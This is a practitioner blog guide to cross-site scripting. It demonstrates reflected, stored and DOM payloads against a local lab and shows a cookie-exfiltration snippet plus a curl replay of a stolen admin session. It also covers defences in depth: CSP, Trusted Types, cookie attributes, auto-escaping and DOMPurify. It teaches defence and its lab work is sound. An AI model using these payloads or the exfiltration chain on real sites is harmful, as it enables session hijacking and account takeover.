TechEarl

Cross-Site Scripting (XSS): The Complete 2026 Practitioner Guide

Cross-site scripting deep dive: three variants (reflected, stored, DOM), the cookie-theft chain end to end, and the modern defences (CSP, Trusted Types, HttpOnly, framework auto-escaping) that actually move the needle.

Ishan Karunaratne · 25 min read

Cross-site scripting is the second class on the web application security vulnerabilities map and the one I find most often after SQL injection. It is catalogued as CWE-79 and has been folded into A03 Injection in the OWASP Top 10 since the 2021 revision. The mechanism is older than jQuery, the defences are now mature, and the bug is still everywhere because the surface keeps growing: every new rendering layer (server templates, then client-side frameworks, then component islands, then streaming partials) ships its own escape hatches and its own footguns.

This article is the deep dive that sits next to the SQL injection guide under the same security hub. I cover the three variants (reflected, stored, DOM) with reproducible exploits against a small Dockerised lab, walk the cookie-theft chain end to end including the modern routes that sidestep HttpOnly, then turn around and cover the defences (CSP, Trusted Types, secure cookie attributes, framework auto-escaping, DOMPurify) in equal depth.

In short: what is cross-site scripting?

Cross-site scripting (XSS) is what happens when an application writes user-controlled data into a page in a context where the browser parses it as code instead of as text. The attacker's input lands in a victim's browser as executable JavaScript running in the application's origin, with the victim's cookies and the victim's session. From there it can read the DOM, exfiltrate session tokens, make authenticated requests to the application's API, rewrite the page to phish credentials, or pivot to install a persistent payload via a service worker. The three classical variants are reflected (payload echoed from the current request), stored (payload saved to the database and rendered to every subsequent viewer), and DOM-based (payload need never touch the server because the sink is in client-side JavaScript). XSS still matters in 2026 because framework auto-escaping closed the easy reflected cases but the surface moved into client-side rendering, into rich-text editors, into iframe sandboxes leaking back into parents, and into the dangerouslySetInnerHTML / v-html / bypassSecurityTrustHtml escape hatches that every modern UI framework ships and every product eventually reaches for.

What is XSS, mechanically?

XSS is a parser-confusion bug, identical in shape to SQL injection but with the browser's HTML/JS parser as the target instead of the database's SQL parser. The application emits a response that mixes developer-authored markup with user-supplied data. The browser parses the whole response as HTML. Any user-supplied bytes that happen to look like HTML (<script>, <img onerror=...>, javascript: URLs in href, event-handler attributes, <svg> with embedded JS) get parsed as HTML and executed as such.

The canonical vulnerable code, in PHP, is:

php
$q = $_GET['q'];
echo "<h2>Results for: $q</h2>";

A normal request is ?q=node, producing <h2>Results for: node</h2>. An attacker request is ?q=<script>alert(1)</script>, producing <h2>Results for: <script>alert(1)</script></h2>. The browser sees a script tag, executes it, and the box pops.

That is the entire mechanism. Every variant below is a different answer to the question "where did the user input come from, and when does the browser see it?".
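For contrast, here is a minimal sketch of the fix in JavaScript, assuming a hypothetical server-side renderer. The names `escapeHtml` and `renderHeading` are illustrative and not part of the lab. The idea is to encode the five HTML-significant characters at the point of output, so the browser receives text rather than markup.

```javascript
// Hypothetical helper: encode the characters that can change HTML parsing.
const HTML_ENTITIES = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
};

function escapeHtml(value) {
    return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Hypothetical equivalent of the PHP echo above, with output encoding applied.
function renderHeading(q) {
    return `<h2>Results for: ${escapeHtml(q)}</h2>`;
}

console.log(renderHeading('<script>alert(1)</script>'));
// → <h2>Results for: &lt;script&gt;alert(1)&lt;/script&gt;</h2>
```

In the PHP snippet itself, the equivalent change is to wrap the value in htmlspecialchars($q, ENT_QUOTES, 'UTF-8') before echoing it.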

A note on OWASP Top 10 placement

XSS used to be its own category in the OWASP Top 10 (A7 in 2017). In the 2021 revision, XSS was merged into A03 Injection alongside SQL injection and the rest of the injection family, because the underlying mistake (untrusted input parsed as code in an interpreter) is the same across all of them. The category move is not a downgrade of the risk; it is a recognition that the mental model is shared.

The vulnerable app I am attacking

For every example below, assume a minimal PHP/MySQL app with three intentionally-vulnerable rendering sinks and one deliberately misconfigured session cookie:

  • GET /search.php?q=<query> reflects q into the page's <h2> heading without escaping.
  • GET /guestbook.php (authenticated) accepts comments, stores them, and renders every comment body raw to every subsequent viewer. The admin dashboard at /admin.php reads the same comments, so a payload posted by a regular user fires inside an admin's session when the admin visits.
  • GET /share.php#<payload> reads location.hash in inline JavaScript and writes it into the DOM via innerHTML. The fragment never touches the server.
  • The session cookie session_id is set without HttpOnly, Secure, or SameSite, so document.cookie can read it from any of the three sinks.

A Docker target with this exact API lives in the techearl-labs companion repo at cross-site-scripting/xss-basic: docker compose up xss-basic and hit http://localhost:8081. All payloads below are reproducible against that target.

Variant 1: reflected XSS

Reflected XSS is the simplest variant. The payload lives in the current request (query string, form body, header), the server reflects it into the response, the browser parses the response and executes it. The attacker delivers the payload by getting a victim to click a crafted link (phishing email, malicious tweet, ad link, link in a forum post).

The vulnerable code is the PHP snippet above. The exploit against the lab:

code
http://localhost:8081/search.php?q=<script>alert(1)</script>

The q parameter is interpolated into <h2>Results for: $q</h2> with no escaping. The browser parses the resulting HTML, sees a real <script> element, executes its contents, and alert(1) runs. No login required, no persistence: the payload only fires for whoever clicks the link.

Reflected XSS was the dominant variant a decade ago because server-rendered apps with raw string interpolation were the norm. Modern templating engines (Twig, Blade, JSX, and Jinja or ERB as configured by Flask and Rails) auto-escape by default, which has pushed reflected XSS into a smaller surface: search result pages with custom highlighting, error pages that echo the failing parameter, redirect handlers that put a next URL in the body, and anywhere an engineer reached for a |raw filter or dangerouslySetInnerHTML to render "trusted" markup that turned out not to be.

Real incident: the Samy worm (October 2005) was stored XSS in MySpace's profile editor, and it shows how input filtering fails. Samy Kamkar bypassed MySpace's filter (which blocked <script> and javascript:) by smuggling JS into a CSS background:url() value and splitting the keyword as java\nscript: so the filter missed it. The payload added Samy as a friend and copied itself into the victim's profile. Around one million MySpace accounts were infected in roughly twenty hours before the site was taken offline. It is the canonical worked example of "filtering is not parameterisation".

Variant 2: stored XSS

Stored XSS (also called persistent XSS) saves the payload server-side and serves it back to every viewer. The attacker submits the payload once; every subsequent page load by every user becomes the trigger. No phishing required, no per-victim click. This is the variant that actually scales.

The vulnerable code in the lab is the guestbook handler:

php
$stmt = $pdo->prepare("INSERT INTO comments (user_id, body) VALUES (?, ?)");
$stmt->execute([$_SESSION['user_id'], $_POST['body']]);

// later, on render:
foreach ($comments as $c) {
    echo "<div class='comment'>{$c['body']}</div>";
}

The insert is parameterised (no SQL injection), and the developer told themselves the database is the trust boundary. It is not. The string was attacker-supplied; storing it safely does not sanitise it. The rendering step concatenates it back into HTML and the browser parses it as HTML.

The exploit against the lab:

  1. Sign in as alice at http://localhost:8081/login.php (password alice123).
  2. Open http://localhost:8081/guestbook.php and post a comment with the body <script>alert(1)</script>.
  3. Reload any page that renders the guestbook (/, /guestbook.php, /admin.php). The script fires in every visitor's browser, including the admin's.

Stored XSS is the variant that powered most of the high-profile XSS incidents: the Samy worm copying itself into MySpace profiles; the TweetDeck self-retweeting XSS (June 2014) where a <script> tag in a tweet ran inside other users' TweetDeck clients on render; long-running stored XSS in eBay listing descriptions throughout the mid-2010s. Wherever user-generated content is rendered to other users (comments, reviews, profiles, ticket descriptions, error reports, support chat history), stored XSS is the dominant risk.

Variant 3: DOM-based XSS

DOM-based XSS lives entirely in the browser. The payload never reaches the server (or, if it does, the server does not reflect it). The vulnerability is client-side JavaScript that reads a source the attacker controls (location.hash, location.search, document.referrer, window.name, postMessage data, localStorage) and passes it to a sink that either parses HTML (innerHTML, outerHTML, document.write, insertAdjacentHTML, jQuery's $(...) with an HTML string) or executes a string as code (eval, the Function constructor, setTimeout with a string argument).

The vulnerable code in the lab's share.php:

html
<div id="target"></div>
<script>
    document.getElementById('target').innerHTML = location.hash.slice(1);
</script>

The exploit:

code
http://localhost:8081/share.php#<img src=x onerror=alert(1)>

Two details matter here. First, the fragment (#...) is never sent to the server, so server-side logs and WAFs do not see the payload. Second, you cannot use a plain <script> tag inside innerHTML: the HTML spec requires the parser to skip script execution for content inserted this way. Use a tag that triggers script via an event handler instead (<img onerror>, <svg onload>, <input autofocus onfocus>), or an <iframe srcdoc> whose embedded document carries its own script.

DOM XSS has become the dominant variant in modern single-page apps because the server is now mostly a JSON API and the rendering layer has moved client-side. Every framework's HTML-rendering escape hatch (dangerouslySetInnerHTML in React, v-html in Vue, bypassSecurityTrustHtml in Angular, {@html} in Svelte) is a DOM XSS waiting to happen if anyone passes user-controlled data through it. Same for any code that builds a URL from input and assigns it to <a href> without checking the scheme: a javascript:alert(1) URL is a working XSS payload.
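A minimal sketch of the fix for the share.php sink, assuming the fragment is only ever meant to be shown as text. The function name `renderFragment` is hypothetical. It writes through textContent, which never invokes the HTML parser, and it takes the target element as a parameter so the behaviour can be checked outside a browser.

```javascript
// Hypothetical replacement for the inline script in share.php.
// textContent never invokes the HTML parser, so markup in the fragment
// is displayed as literal characters instead of becoming DOM nodes.
function renderFragment(target, hash) {
    const raw = hash.startsWith('#') ? hash.slice(1) : hash;
    let text;
    try {
        text = decodeURIComponent(raw);
    } catch {
        // Malformed percent-encoding: fall back to the raw fragment.
        text = raw;
    }
    target.textContent = text;
    return target;
}

// In the browser:
//   renderFragment(document.getElementById('target'), location.hash);
// Outside a browser, any object with a textContent property shows the behaviour:
const fakeTarget = { textContent: '' };
renderFragment(fakeTarget, '#%3Cimg%20src=x%20onerror=alert(1)%3E');
console.log(fakeTarget.textContent);
// → <img src=x onerror=alert(1)>
```

The payload still arrives intact, but it is assigned as a text node, so the browser renders the characters and never builds an img element from them.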

How do attackers steal cookies with XSS?

The classic XSS-to-session-hijack chain has four steps:

  1. Land an XSS payload in the victim's browser (any of the three variants above).
  2. From inside that payload, read the session cookie via document.cookie.
  3. Exfiltrate it to an attacker-controlled host (fetch, navigator.sendBeacon, or an image beacon such as new Image().src=...).
  4. Replay the captured cookie value in a fresh browser or via curl -b 'session_id=...'. The application sees the request as the victim and renders the victim's pages.

End-to-end against the lab:

html
<script>new Image().src='http://localhost:9000/c?'+document.cookie</script>

Posted as a guestbook comment by alice, this fires in every viewer's browser. When the admin loads /admin.php, the payload runs in the admin's session, reads the admin's session_id from document.cookie, and triggers a GET to the attacker's listener (python3 -m http.server 9000 is enough for the demo). The query string of that request contains the admin's session ID. Replay it:

bash
curl -b 'session_id=<stolen-value>' http://localhost:8081/admin.php

The admin dashboard renders. The hijack is complete.

The primary defence at the cookie layer is the HttpOnly attribute, set when the application emits the Set-Cookie header. HttpOnly tells the browser to attach the cookie to HTTP requests but hide it from JavaScript: HttpOnly cookies are simply omitted from the string that document.cookie returns. With HttpOnly, the step-two read in the chain above comes back without the session cookie, and a clean XSS payload cannot steal the session token directly. HttpOnly was introduced by Microsoft in Internet Explorer 6 SP1 in 2002 and is supported by every major browser today; there is no excuse for shipping a session cookie without it.

HttpOnly is necessary but not sufficient. Two modern routes sidestep it entirely:

  • Adversary-in-the-middle phishing (AiTM). Tools like Evilginx act as a reverse proxy in front of the real login page. The victim authenticates against the real site through the proxy, completes MFA, and the proxy captures the response Set-Cookie header before passing it through. The attacker now has the session cookie without ever needing JavaScript inside the victim's browser. HttpOnly is irrelevant: the proxy sits in front of the HTTP exchange, not inside the browser.
  • Infostealer malware. Off-the-shelf infostealer families (RedLine, Vidar, Raccoon, Lumma) walk the browser's cookie store on disk and exfiltrate every session cookie for every site the victim has signed into. The malware reads the cookie database directly from the filesystem; HttpOnly is, again, a browser-internal flag and does not affect on-disk encryption (which on most platforms uses a key the user's own processes can derive).

The point is that HttpOnly blocks the in-browser script-reads-cookie path, which is the only path you control as the application owner. It does not block out-of-band session theft. The defence against the modern routes is at a different layer: phishing-resistant MFA (WebAuthn, hardware keys), short-lived session tokens, IP and device binding, and re-authentication for sensitive operations.

There are also XSS-driven session abuses that do not need document.cookie at all. If the cookie has HttpOnly set, the script cannot read it, but the browser will still send it on every same-origin request the script makes. The XSS payload can call the application's own API directly with fetch('/api/admin/transfer', { method: 'POST', credentials: 'include', body: ... }), ride the session, and act as the victim without ever exfiltrating the token. HttpOnly is a defence against token theft, not a defence against authenticated request forgery from inside the page. CSRF tokens do not help here either, because the same XSS can read the CSRF token straight from the DOM.

Walking three working chains against the lab

The full lab walkthrough lives in the README at techearl-labs/cross-site-scripting/xss-basic. The three minimal reproducers follow, one per variant.

Reflected XSS

bash
# Confirm the sink reflects raw HTML:
curl -s 'http://localhost:8081/search.php?q=<x>' | grep 'Results for'

Expected output contains Results for: <x> (literal, not entity-escaped). Then in a browser:

code
http://localhost:8081/search.php?q=<script>alert(1)</script>

The alert fires. Replace the payload with the cookie-exfil snippet from the previous section to capture the session of whoever clicks the link.

Stored XSS

Sign in as alice, post <script>alert(1)</script> to the guestbook, sign out, then load the landing page in any browser session. The alert fires for every visitor. To target the admin specifically, post the cookie-exfil payload and wait for an admin to load /admin.php; that page reads the same comment stream.

DOM XSS

code
http://localhost:8081/share.php#<img src=x onerror=alert(1)>

No login, no server logs of the payload, no WAF visibility. The fragment is delivered through the URL, read by inline JavaScript, and rendered through innerHTML. The <img onerror> form is required because innerHTML will not execute a plain <script> tag.

Modern defences

Content Security Policy

A Content-Security-Policy (CSP) response header tells the browser which sources of script, style, image, frame, and other resources the page is allowed to load and execute. A strict CSP prevents arbitrary <script> tags injected via XSS from running at all, because the script source will not be on the allow-list and inline scripts will be refused unless they carry a matching nonce or hash. Full reference at MDN's CSP page.

A realistic strict policy for a modern app:

code
Content-Security-Policy:
  default-src 'self';
  script-src 'self' 'nonce-r4nd0m' 'strict-dynamic';
  style-src 'self' 'unsafe-inline';
  img-src 'self' data: https://images.example.com;
  connect-src 'self' https://api.example.com;
  frame-ancestors 'none';
  base-uri 'none';
  object-src 'none';
  form-action 'self';

The nonce-r4nd0m value is a per-response random string the server emits in both the CSP header and on every legitimate <script nonce="r4nd0m"> tag. An injected script without the nonce will not run. 'strict-dynamic' lets scripts loaded with a valid nonce load further scripts they need, so the policy does not require a giant allow-list of every CDN.

Two practical notes. First, CSP is enforced by the browser, so it is defence in depth: if your app has zero XSS bugs, CSP changes nothing; if your app has one XSS bug, CSP can turn it from a working exploit into a console warning. Second, getting from no-CSP to strict-CSP on a real app is a multi-week project: every inline event handler (onclick="...") must be rewritten as an addEventListener call in a script file, because an attribute cannot carry a nonce, and every inline and third-party script must either carry the nonce or move to an external file. Inline style attributes need the same treatment only once you drop 'unsafe-inline' from style-src. Start with Content-Security-Policy-Report-Only to see what would break, then promote.
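One way the per-response nonce could be produced and threaded through, as a rough sketch in Node. The helper names (`generateNonce`, `buildCspHeader`, `scriptTag`) and the /static/app.js path are assumptions for illustration, and the directive list is shortened to the script-related parts of the policy above.

```javascript
const crypto = require('node:crypto');

// Generate a fresh, unguessable nonce for one response (128 bits, base64).
function generateNonce() {
    return crypto.randomBytes(16).toString('base64');
}

// Build the header name and value for one response.
// reportOnly=true yields the Report-Only variant for a dry run.
function buildCspHeader(nonce, { reportOnly = false } = {}) {
    const directives = [
        "default-src 'self'",
        `script-src 'nonce-${nonce}' 'strict-dynamic'`,
        "object-src 'none'",
        "base-uri 'none'",
        "frame-ancestors 'none'",
    ];
    return {
        name: reportOnly
            ? 'Content-Security-Policy-Report-Only'
            : 'Content-Security-Policy',
        value: directives.join('; '),
    };
}

// Hypothetical template helper: the same nonce goes on every legitimate
// script tag. `src` is assumed to be developer-controlled, never user input.
function scriptTag(src, nonce) {
    return `<script nonce="${nonce}" src="${src}"></script>`;
}

const nonce = generateNonce();
const header = buildCspHeader(nonce);
console.log(`${header.name}: ${header.value}`);
console.log(scriptTag('/static/app.js', nonce));
```

The important property is that the nonce is generated per response and never reused or cached: a nonce an attacker can predict or read from an earlier response is equivalent to no nonce.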

Trusted Types

Trusted Types is a browser API that makes the dangerous DOM sinks (innerHTML, document.write, eval, setTimeout(string, ...)) refuse to accept plain strings and only accept "trusted" objects created by a named policy. Documented in web.dev's Trusted Types guide. The effect is that DOM XSS through those sinks is reduced to the quality of your policies: an attacker-controlled string cannot reach a sink without first passing through a policy function that you wrote and can audit.

Enable it via CSP:

code
Content-Security-Policy: require-trusted-types-for 'script'; trusted-types app-html dompurify;

Then in application code, every assignment to innerHTML (or equivalent sink) has to route through a policy:

javascript
// 'app-html' is an example name; it must match the trusted-types directive above.
const policy = trustedTypes.createPolicy('app-html', {
    createHTML: (input) => DOMPurify.sanitize(input),
});

element.innerHTML = policy.createHTML(userInput);

A raw string assignment (element.innerHTML = userInput) now throws a TypeError instead of silently rendering an attacker payload. Do not name the policy default unless you want the opposite behaviour: a policy called default is applied implicitly to every raw string that reaches a sink, so nothing throws. The dompurify entry in the directive allows the policy DOMPurify registers for its own internal parsing (named dompurify at the time of writing; check the library's documentation). Trusted Types is supported in Chromium-based browsers (Chrome, Edge) as a fully shipped feature; support in Firefox and Safari has lagged and is changing as of 2026 (verify current shipping status against MDN before relying on it). In any browser that does not enforce it, Trusted Types is a no-op: the sinks accept strings as they always did. That means Trusted Types is meaningful as a defence-in-depth layer for the share of your traffic that enforces it and as a forcing function for clean code patterns across the whole codebase. It is not a single browser-portable defence on its own.
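Because enforcement varies by browser, application code usually needs one call shape that works either way. The sketch below shows one hedged way to do that. `makeHtmlPolicy` and the policy name `app-html` are assumptions (the name must match whatever the trusted-types directive allows), and `stripTags` is a stand-in for the demo only, not a real sanitiser.

```javascript
// Hypothetical factory: returns an object with createHTML() whether or not
// the browser implements Trusted Types. `sanitize` is whatever sanitiser
// the app uses (DOMPurify.sanitize in the article's example).
function makeHtmlPolicy(globalObj, sanitize) {
    const rules = { createHTML: (input) => sanitize(input) };
    const tt = globalObj.trustedTypes;
    if (tt && typeof tt.createPolicy === 'function') {
        // Enforcing browsers: createHTML() returns a TrustedHTML object.
        return tt.createPolicy('app-html', rules);
    }
    // Other browsers: same call shape, plain sanitised string out.
    return rules;
}

// Stand-in sanitiser for the demo only; it is NOT a real HTML sanitiser.
const stripTags = (s) => String(s).replace(/<[^>]*>/g, '');

// Simulate a browser without Trusted Types by passing an empty global.
const policy = makeHtmlPolicy({}, stripTags);
console.log(policy.createHTML('<img src=x onerror=alert(1)>hello'));
// → hello
```

In a page, the call would be makeHtmlPolicy(window, DOMPurify.sanitize), and every innerHTML assignment would go through the returned object's createHTML. Browsers without enforcement still get the sanitiser; they just do not get the TypeError on the paths that bypass it.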

Secure cookie attributes

The three attributes that every session cookie must carry, every time:

code
Set-Cookie: session_id=<value>; HttpOnly; Secure; SameSite=Lax; Path=/

  • HttpOnly prevents document.cookie reads from JavaScript. Discussed above.
  • Secure prevents the cookie from being sent over plain HTTP. With HSTS in place the practical risk is low, but the cost is zero and the attribute is correct on principle.
  • SameSite=Lax prevents the cookie from being sent on cross-site subresource requests and cross-site POSTs, which is the underlying defence against CSRF. Chrome began making SameSite=Lax the default for unmarked cookies in February 2020 (Chrome 80); other browsers have not uniformly adopted that default, so set the attribute explicitly rather than relying on it.

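For a cookie that genuinely needs to flow on the cross-site requests that Lax blocks (cross-site POSTs and embedded iframes, as in a few federated-login flows), SameSite=None; Secure is the correct setting. Plain top-level link navigations already carry a Lax cookie. Anything else should be Lax or Strict.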
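To keep the attributes from being forgotten at individual call sites, the header can be assembled in one place. This is a minimal sketch, assuming a hypothetical helper named `buildSessionCookie`; the cookie name session_id follows the lab, and the Max-Age option is an addition for illustration.

```javascript
// Hypothetical helper that assembles the Set-Cookie value for a session cookie.
function buildSessionCookie(value, { sameSite = 'Lax', maxAgeSeconds } = {}) {
    if (!['Strict', 'Lax', 'None'].includes(sameSite)) {
        throw new Error(`Unsupported SameSite value: ${sameSite}`);
    }
    const parts = [
        `session_id=${encodeURIComponent(value)}`,
        'Path=/',
        'HttpOnly',
        'Secure', // always on; browsers reject SameSite=None without it
        `SameSite=${sameSite}`,
    ];
    if (Number.isInteger(maxAgeSeconds) && maxAgeSeconds > 0) {
        parts.push(`Max-Age=${maxAgeSeconds}`);
    }
    return parts.join('; ');
}

console.log(buildSessionCookie('abc123'));
// → session_id=abc123; Path=/; HttpOnly; Secure; SameSite=Lax
```

With Node's built-in http module the result would be passed to res.setHeader('Set-Cookie', ...). Most frameworks expose the same three attributes as cookie options, and those are preferable to hand-built strings where they exist.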

Framework auto-escaping

The single largest win against XSS in the last decade is framework defaults. React, Angular, Vue, Svelte, and modern server-side template engines all auto-escape interpolations in their default rendering path:

jsx
// React, safe by default:
<h2>Results for: {query}</h2>

query is rendered as text, not HTML. <script> in the value renders as literal text on the page. To opt out, you have to reach for dangerouslySetInnerHTML in React, v-html in Vue, bypassSecurityTrustHtml in Angular, {@html} in Svelte, or |safe in Jinja. Those are the escape hatches, and they are where XSS lives in modern code:

jsx
// React, unsafe if `query` is user-controlled:
<h2 dangerouslySetInnerHTML={{ __html: `Results for: ${query}` }} />

If you find one of these calls in a code review, that is the starting point for the XSS audit. The name dangerouslySetInnerHTML was chosen deliberately; treat it as a warning.
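That first pass can be automated. The sketch below is a rough, regex-based scanner for the opt-out APIs named above; `findEscapeHatches` and its pattern list are hypothetical, and a hit marks a call site to review rather than a confirmed bug.

```javascript
// Patterns for the opt-out APIs named above. A match is a place to look,
// not proof of a bug: the data flowing in may be constant or sanitised.
const ESCAPE_HATCHES = [
    { name: 'React dangerouslySetInnerHTML', pattern: /dangerouslySetInnerHTML/ },
    { name: 'Vue v-html', pattern: /\bv-html\b/ },
    { name: 'Angular bypassSecurityTrustHtml', pattern: /bypassSecurityTrustHtml/ },
    { name: 'Svelte {@html}', pattern: /\{@html\b/ },
    { name: 'Jinja |safe', pattern: /\|\s*safe\b/ },
];

// Return one finding per (line, pattern) hit, with 1-based line numbers.
function findEscapeHatches(source) {
    const findings = [];
    source.split(/\r?\n/).forEach((text, index) => {
        for (const { name, pattern } of ESCAPE_HATCHES) {
            if (pattern.test(text)) {
                findings.push({ line: index + 1, name, text: text.trim() });
            }
        }
    });
    return findings;
}

const sample = [
    '<h2>Results for: {query}</h2>',
    '<h2 dangerouslySetInnerHTML={{ __html: query }} />',
    '<div v-html="comment.body"></div>',
].join('\n');

console.log(findEscapeHatches(sample).map((f) => `${f.line}: ${f.name}`));
// → [ '2: React dangerouslySetInnerHTML', '3: Vue v-html' ]
```

A text scan like this will miss aliased or dynamically built calls and will flag harmless ones, so it is a way to build the review list, not a substitute for reading each call site.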

Two caveats on framework auto-escaping. First, it only protects the interpolation step, not the URL-attribute step: <a href={userUrl}> will happily render javascript:alert(1) because the framework cannot tell whether you meant an HTTP URL or a JS URL. Validate URL schemes before interpolation. Second, server-side rendering (Next.js, Nuxt, Remix) shares the same auto-escape, but the same escape hatches exist server-side and are easier to overlook because the "it is just a string" feeling is stronger.
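A hedged sketch of the scheme check from the first caveat, using the standard URL parser rather than string matching. `safeHref`, the allow-list, and the base URL https://app.example.com/ are assumptions for illustration.

```javascript
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:', 'mailto:']);

// Hypothetical helper: returns the URL if its scheme is allowed, else '#'.
// The base URL is an assumption that lets relative links resolve and pass.
function safeHref(candidate, base = 'https://app.example.com/') {
    let parsed;
    try {
        parsed = new URL(String(candidate).trim(), base);
    } catch {
        return '#';
    }
    return ALLOWED_PROTOCOLS.has(parsed.protocol) ? parsed.href : '#';
}

console.log(safeHref('javascript:alert(1)'));       // → #
console.log(safeHref('JaVaScRiPt:alert(1)'));       // → #
console.log(safeHref('/account/settings'));         // → https://app.example.com/account/settings
console.log(safeHref('https://example.org/a?b=1')); // → https://example.org/a?b=1
```

Parsing first and comparing the normalised protocol is the point of the design: the parser lower-cases the scheme and strips embedded tabs and newlines the same way the browser will, which is exactly what keyword filters get wrong. Note that relative links come back as absolute URLs against the assumed base.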

DOMPurify for unavoidable user HTML

Some products genuinely need to render attacker-shaped HTML: a rich-text editor where users post formatted comments, a markdown renderer with embedded HTML, a feed reader pulling third-party RSS. For those, sanitise with DOMPurify before injecting. DOMPurify parses the HTML in a sandboxed document, walks the resulting tree, and strips every element, attribute, and URL scheme not on its allow-list. It is the only sanitiser I trust in production.

javascript
import DOMPurify from 'dompurify';

element.innerHTML = DOMPurify.sanitize(userHtml, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br', 'ul', 'ol', 'li', 'code', 'pre'],
    ALLOWED_ATTR: ['href'],
    ALLOWED_URI_REGEXP: /^(?:(?:https?|mailto):|[^a-z]|[a-z+.\-]+(?:[^a-z+.\-:]|$))/i,
});

Pair it with Trusted Types where you have a Chromium audience: the DOMPurify policy becomes the only path that produces the trusted object, and every other path throws.

Real-world incidents

A short tour of XSS in production. I have deliberately limited each to claims I am confident about; for the version-specific or CVSS-specific details, verify against the linked advisory before quoting.

  • Samy worm, MySpace (October 2005). Stored XSS in profile-page HTML that bypassed MySpace's javascript: and <script> filter by placing a javascript: URL inside a CSS background:url() value and splitting the keyword as java\nscript:. Samy Kamkar's payload added the worm author as a friend and copied itself into the victim's profile, propagating roughly a million friend requests in about twenty hours before MySpace took the site down. The canonical example of "blacklist filtering is not parameterisation".
  • TweetDeck stored XSS (June 2014). A <script> tag posted in a tweet rendered without escaping inside TweetDeck's web client, popping for any TweetDeck user who saw the tweet in their timeline. A retweet-on-load payload propagated for hours before Twitter pushed a fix and forced a logout.
  • British Airways formjacking (August/September 2018). A Magecart-style supply-chain compromise modified a JavaScript file BA loaded on its payment pages, exfiltrating about 380,000 cards and personal records to an attacker-controlled domain. The ICO fined BA £20 million in 2020 (reduced from an initial proposed £183m). Not classical XSS, but the underlying primitive (attacker-controlled JavaScript running in the application's origin) is identical, and the case is the strongest argument for strict CSP with a tight connect-src allow-list: a customer's browser would not have been able to POST to the attacker's domain if the request had been blocked at the CSP layer.
  • Fortinet FortiSIEM XSS (CVE-2023-34985 et al.). Stored XSS in administrative interfaces of security-product management consoles is a recurring class. Every major security vendor has shipped one; treat security-product UIs with the same XSS scrutiny as anything else.
  • Generic CVE pattern: rich-text editor sinks. Search the CVE database for "XSS" and any popular WYSIWYG editor (TinyMCE, CKEditor, Quill, Slate). New entries appear several times a year. Rich-text editors are the highest-density XSS surface in modern apps because they exist specifically to render attacker-shaped HTML.

For the per-CVE details (affected versions, CVSS, patch availability), pull the entry from nvd.nist.gov or the vendor advisory at the time of writing; version-specific claims age fast, and I would rather link out than risk a stale number.

Common defence mistakes I still see

  1. Blacklist filtering of <script> and javascript:. The Samy worm broke this pattern in 2005 and it has been broken in the same ways ever since: case-changes, encoding, line breaks inside the keyword, alternative tags (<svg>, <math>, <details ontoggle>), data: URLs, javascript&#58;. Use a sanitiser that parses HTML and applies an allow-list, or do not let raw HTML reach the renderer at all.
  2. Trusting Content-Type: application/json to prevent XSS. A JSON endpoint that reflects user input can still be XSS if a browser sniffs it as HTML (older browsers) or if the response is loaded into a context that parses HTML (a fetch followed by innerHTML, a <script src> to a JSONP endpoint). Send X-Content-Type-Options: nosniff on every response and never put user input directly into a JSONP callback name.
  3. Trusting HttpOnly to stop session theft. HttpOnly blocks document.cookie reads from the page. It does not stop XSS from making authenticated requests via the browser's automatic cookie attachment, does not stop AiTM phishing, and does not stop infostealer malware reading the cookie store off disk. HttpOnly is necessary; it is not the whole story.
  4. CSP with 'unsafe-inline' in script-src. This is the default many teams ship to make migration painless. It also makes the CSP useless for XSS: any injected <script> tag executes, because inline script is allowed. The whole point of CSP for XSS defence is the nonce or hash gate. Remove 'unsafe-inline' from script-src or do not bother.
  5. Sanitising on input instead of on output. Sanitising at the input boundary feels safe and produces silently-broken behaviour for a year before someone notices that the database is full of mangled content. Sanitise (or escape) at the output boundary, in the encoding appropriate to that context: HTML body, HTML attribute, JavaScript string, URL parameter, CSS. The contexts have different escape rules; the OWASP Cross Site Scripting Prevention Cheat Sheet lists them.
  6. WAF as the only defence. ModSecurity with the OWASP CRS will catch the obvious payloads and slow opportunistic scanning. It will not catch stored XSS where the payload was injected long before it was rendered, will not catch DOM XSS (the payload never reaches the WAF), and will not catch novel encodings. WAF is one layer.
  7. Assuming React/Angular/Vue makes you safe. They make the default path safe, which is where most code lives, but dangerouslySetInnerHTML, bypassSecurityTrustHtml, v-html, {@html}, and any URL-attribute interpolation are still vulnerable. Grep for the escape hatches and audit each call site.
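Mistake 5 says each output context has its own escape rules. To illustrate, here is a minimal sketch of two contexts where HTML entity encoding is the wrong tool: a value embedded in an inline script, and a value embedded in a URL parameter. The function names are hypothetical, and this is not a replacement for the full rules in the OWASP cheat sheet.

```javascript
// JavaScript string context, e.g. <script>const q = ...;</script>.
// JSON.stringify handles quotes and backslashes; the extra replacements stop
// "</script>" or "<!--" in the data from ending or confusing the script block.
function encodeForInlineScript(value) {
    return JSON.stringify(String(value))
        .replace(/</g, '\\u003c')
        .replace(/>/g, '\\u003e')
        .replace(/&/g, '\\u0026')
        .replace(/\u2028/g, '\\u2028')
        .replace(/\u2029/g, '\\u2029');
}

// URL parameter context, e.g. href="/search?q=...".
// encodeURIComponent leaves ' unescaped, so keep the attribute double-quoted.
function encodeForUrlParam(value) {
    return encodeURIComponent(String(value));
}

const payload = '</script><script>alert(1)</script>';
console.log(encodeForInlineScript(payload));
console.log(encodeForUrlParam('a&b=<c>'));
// → a%26b%3D%3Cc%3E
```

The inline-script encoder returns a quoted JavaScript string literal that evaluates back to the original value, while containing no character the HTML parser could treat as the end of the script element.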

Where to go next

The XSS cluster fans out from this hub the same way the SQL injection cluster does. The deeper variant article on cookie theft and session hijack will live at /xss-stealing-session-cookies with the full Evilginx and infostealer walkthroughs. The tools listicle will live at /best-xss-tools-2026 covering DOMPurify, the OWASP ZAP DOM scanner, XSStrike, BeEF, and the manual workflow.

For the wider map, back up to the web application security vulnerabilities taxonomy. For the sister variant that uses the same code/data confusion pattern at the database layer, the SQL injection deep dive is the closest analogue: same mistake, different interpreter, same shape of defence.

Ishan Karunaratne

Tech Architect · Software Engineer · AI/DevOps

Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.
